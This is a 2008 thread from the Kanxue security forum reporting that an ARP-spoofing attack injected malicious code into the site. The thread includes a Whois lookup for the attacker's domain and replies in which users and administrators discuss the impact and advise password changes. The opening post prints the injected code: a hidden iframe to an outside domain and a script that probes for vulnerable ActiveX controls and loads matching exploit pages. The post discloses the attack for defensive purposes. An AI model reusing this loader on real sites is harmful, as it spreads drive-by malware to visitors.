[注意]8月2号早上9点左右看雪机房被ARP攻击，现已修复-社区版务-看雪-安全社区|安全招聘|kanxue.com

[注意]8月2号早上9点左右看雪机房被ARP攻击，现已修复

发表于: 2008-8-2 09:35 5933

[注意]8月2号早上9点左右看雪机房被ARP攻击，现已修复

mstwugui

2008-8-2 09:35

5933

现已修复，请参考14楼服务器管理员的回复

虽然入侵的页面已经被替换掉，但是很可能已经获取了更多的权限。如果坛主看到请尽快查看服务器日志并且做相应的处理，入侵者很可能是浙江温州的ip
7月30号也是在新网注册的临时域名

Registry Data
Created: 2008-07-30
Expires: 2009-07-30
Whois Server: whois.cnnic.net.cn
Server Data
IP Address: 61.164.109.18 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
IP Location China - Zhejiang - Wenzhou - Chinanet-zj Wenzhou Node Network
Domain Status: Registered And No Website
DomainTools Exclusive
Monitor Domain: [Monitor this domain] Set Free Alerts on cc9jhdsa.cn
Free Tool: Download DomainTools
Whois Record

Domain Name: cc9jhdsa.cn
ROID: 20080730s10001s27105689-cn
Domain Status: ok
Registrant Organization: 海天
Registrant Name: 海天
Administrative Email:
Sponsoring Registrar: 北京新网数码信息技术有限公司
Name Server:ns5.cdncenter.com
Name Server:ns6.cdncenter.com
Registration Date: 2008-07-30 00:57
Expiration Date: 2009-07-30 00:57

<iframe src=http://cc9jhdsa.cn/xi/xx.htm width=50 height=0></iframe>
<script src='http://s69.cnzz.com/stat.php?id=971311&web_id=971311' language='JavaScript' charset='gb2312'></script>

<script>
window.status="Íê³É";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=sina.htm></iframe>");}}
try{var n;
var hl=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=0 src=re10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=re11.htm></iframe>");
}
test();
</script>
<script src='http://s127.cnzz.com/stat.php?id=755932&web_id=755932' language='JavaScript' charset='gb2312'></script>

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

pediy2ndAug08.JPG （103.56kb，91次下载）

收藏・2

免费・0

支持

最新回复 (15)
linhanshi 雪币： 93908 活跃值： (200199) 能力值： (RANK：10 ) 在线值：发帖 9213 回帖 27805 粉丝 446 关注私信	linhanshi 2 楼大概有几分钟,我这里也出现过. 2008-8-2 09:38 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 3 楼挂了几个木马，但首页已经被他又替换回去了，肯定是想藏起来再做什么 2008-8-2 09:39 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 4 楼暂时联系不到kanxue，建议大家在看雪正式检查修复以前暂时不要使用Internet Explorer访问论坛，并且尽量避免发布敏感信息安全起见所以在多个板块都重复发了这张帖子，等检查修复好以后请版主删除这不是玩笑，更多信息请参考http://bbs.pediy.com/showthread.php?t=69828 2008-8-2 10:02 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 5 楼暂时联系不到kanxue，建议大家在看雪正式检查修复以前暂时不要使用Internet Explorer访问论坛，并且尽量避免发布敏感信息安全起见所以在多个板块都重复发了这张帖子，等检查修复好以后请版主删除这不是玩笑，更多信息请参考http://bbs.pediy.com/showthread.php?t=69828 2008-8-2 10:03 0
sunsjw 雪币： 8599 活跃值： (5065) 能力值： ( LV4，RANK：50 ) 在线值：发帖 47 回帖 1248 粉丝 12 关注私信	sunsjw 1 6 楼还好我没有用IE，我用火狐，应该没事吧。 2008-8-2 10:10 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 7 楼火狐不会中那几个木马，不过如果入侵者愿意并且知道怎么做，完全可能把整个论坛的信息包括所有用户的注册资料全偷走 2008-8-2 10:14 0
海风月影雪币： 7309 活跃值： (3778) 能力值： (RANK：1130 ) 在线值：发帖 93 回帖 2308 粉丝 119 关注私信	海风月影 22 8 楼关注。。。谢谢提醒幸好从来不用IE 2008-8-2 10:17 0
stalker 雪币： 399 活跃值： (38) 能力值： (RANK：350 ) 在线值：发帖 70 回帖 1064 粉丝 3 关注私信	stalker 8 9 楼啊,正在用IE访问呢,马上撤了 2008-8-2 10:36 0
wuweizi 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 30 粉丝 0 关注私信	wuweizi 10 楼 10点多不能访问论坛约5分钟打开论坛出一堆乱码 2008-8-2 10:42 0
Nisy 雪币： 167 活跃值： (1574) 能力值： ( LV9，RANK：250 ) 在线值：发帖 68 回帖 668 粉丝 42 关注私信	Nisy 5 11 楼我这里也出现了这个问题给kanxue大哥留言了 ~ 邪恶的入侵者 2008-8-2 10:50 0
kanxue 雪币： 44229 活跃值： (19955) 能力值： (RANK：350 ) 在线值：发帖 2369 回帖 17027 粉丝 528 关注私信	kanxue 8 12 楼这个好像是ARP攻击，应是同机房某台主机中木马了，同机房所有主机都会受影响，几分钟后消失，应是机房技术人员即时解决这问题了。一般来说，不会影响服务器本身安全，我联系LOVE进服务器查看一下。奥运期间，还有人搞网络破坏，真是有不怕死的。 2008-8-2 10:55 0
linhanshi 雪币： 93908 活跃值： (200199) 能力值： (RANK：10 ) 在线值：发帖 9213 回帖 27805 粉丝 446 关注私信	linhanshi 13 楼强烈鄙视这些人. 2008-8-2 11:08 0
LOVE 雪币： 2003 活跃值： (61) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 246 粉丝 1 关注私信	LOVE 14 楼经过检查服务器并无任何问题，为机房网关内或者网关外arp欺骗。请各位版主以及管理人员修改密码免遭cookie劫持，或者每次登陆不要记住密码。使用短生命值的cookie，谢谢大家合作。 2008-8-2 12:57 0
sessiondiy 雪币： 2067 活跃值： (82) 能力值： ( LV9，RANK：180 ) 在线值：发帖 37 回帖 3244 粉丝 6 关注私信	sessiondiy 4 15 楼没见过楼上牛牛 2008-8-2 13:49 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 16 楼应该向网警举报这个人渣，多半是想挂马卖钱的 2008-8-2 13:50 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

mstwugui

发帖

866

回帖

280

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (15)
linhanshi 雪币： 93908 活跃值： (200199) 能力值： (RANK：10 ) 在线值：发帖 9213 回帖 27805 粉丝 446 关注私信	linhanshi 2 楼大概有几分钟,我这里也出现过. 2008-8-2 09:38 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 3 楼挂了几个木马，但首页已经被他又替换回去了，肯定是想藏起来再做什么 2008-8-2 09:39 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 4 楼暂时联系不到kanxue，建议大家在看雪正式检查修复以前暂时不要使用Internet Explorer访问论坛，并且尽量避免发布敏感信息安全起见所以在多个板块都重复发了这张帖子，等检查修复好以后请版主删除这不是玩笑，更多信息请参考http://bbs.pediy.com/showthread.php?t=69828 2008-8-2 10:02 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 5 楼暂时联系不到kanxue，建议大家在看雪正式检查修复以前暂时不要使用Internet Explorer访问论坛，并且尽量避免发布敏感信息安全起见所以在多个板块都重复发了这张帖子，等检查修复好以后请版主删除这不是玩笑，更多信息请参考http://bbs.pediy.com/showthread.php?t=69828 2008-8-2 10:03 0
sunsjw 雪币： 8599 活跃值： (5065) 能力值： ( LV4，RANK：50 ) 在线值：发帖 47 回帖 1248 粉丝 12 关注私信	sunsjw 1 6 楼还好我没有用IE，我用火狐，应该没事吧。 2008-8-2 10:10 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 7 楼火狐不会中那几个木马，不过如果入侵者愿意并且知道怎么做，完全可能把整个论坛的信息包括所有用户的注册资料全偷走 2008-8-2 10:14 0
海风月影雪币： 7309 活跃值： (3778) 能力值： (RANK：1130 ) 在线值：发帖 93 回帖 2308 粉丝 119 关注私信	海风月影 22 8 楼关注。。。谢谢提醒幸好从来不用IE 2008-8-2 10:17 0
stalker 雪币： 399 活跃值： (38) 能力值： (RANK：350 ) 在线值：发帖 70 回帖 1064 粉丝 3 关注私信	stalker 8 9 楼啊,正在用IE访问呢,马上撤了 2008-8-2 10:36 0
wuweizi 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 30 粉丝 0 关注私信	wuweizi 10 楼 10点多不能访问论坛约5分钟打开论坛出一堆乱码 2008-8-2 10:42 0
Nisy 雪币： 167 活跃值： (1574) 能力值： ( LV9，RANK：250 ) 在线值：发帖 68 回帖 668 粉丝 42 关注私信	Nisy 5 11 楼我这里也出现了这个问题给kanxue大哥留言了 ~ 邪恶的入侵者 2008-8-2 10:50 0
kanxue 雪币： 44229 活跃值： (19955) 能力值： (RANK：350 ) 在线值：发帖 2369 回帖 17027 粉丝 528 关注私信	kanxue 8 12 楼这个好像是ARP攻击，应是同机房某台主机中木马了，同机房所有主机都会受影响，几分钟后消失，应是机房技术人员即时解决这问题了。一般来说，不会影响服务器本身安全，我联系LOVE进服务器查看一下。奥运期间，还有人搞网络破坏，真是有不怕死的。 2008-8-2 10:55 0
linhanshi 雪币： 93908 活跃值： (200199) 能力值： (RANK：10 ) 在线值：发帖 9213 回帖 27805 粉丝 446 关注私信	linhanshi 13 楼强烈鄙视这些人. 2008-8-2 11:08 0
LOVE 雪币： 2003 活跃值： (61) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 246 粉丝 1 关注私信	LOVE 14 楼经过检查服务器并无任何问题，为机房网关内或者网关外arp欺骗。请各位版主以及管理人员修改密码免遭cookie劫持，或者每次登陆不要记住密码。使用短生命值的cookie，谢谢大家合作。 2008-8-2 12:57 0
sessiondiy 雪币： 2067 活跃值： (82) 能力值： ( LV9，RANK：180 ) 在线值：发帖 37 回帖 3244 粉丝 6 关注私信	sessiondiy 4 15 楼没见过楼上牛牛 2008-8-2 13:49 0
mstwugui 雪币： 503 活跃值： (80) 能力值： (RANK：280 ) 在线值：发帖 44 回帖 866 粉丝 4 关注私信	mstwugui 6 16 楼应该向网警举报这个人渣，多半是想挂马卖钱的 2008-8-2 13:50 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复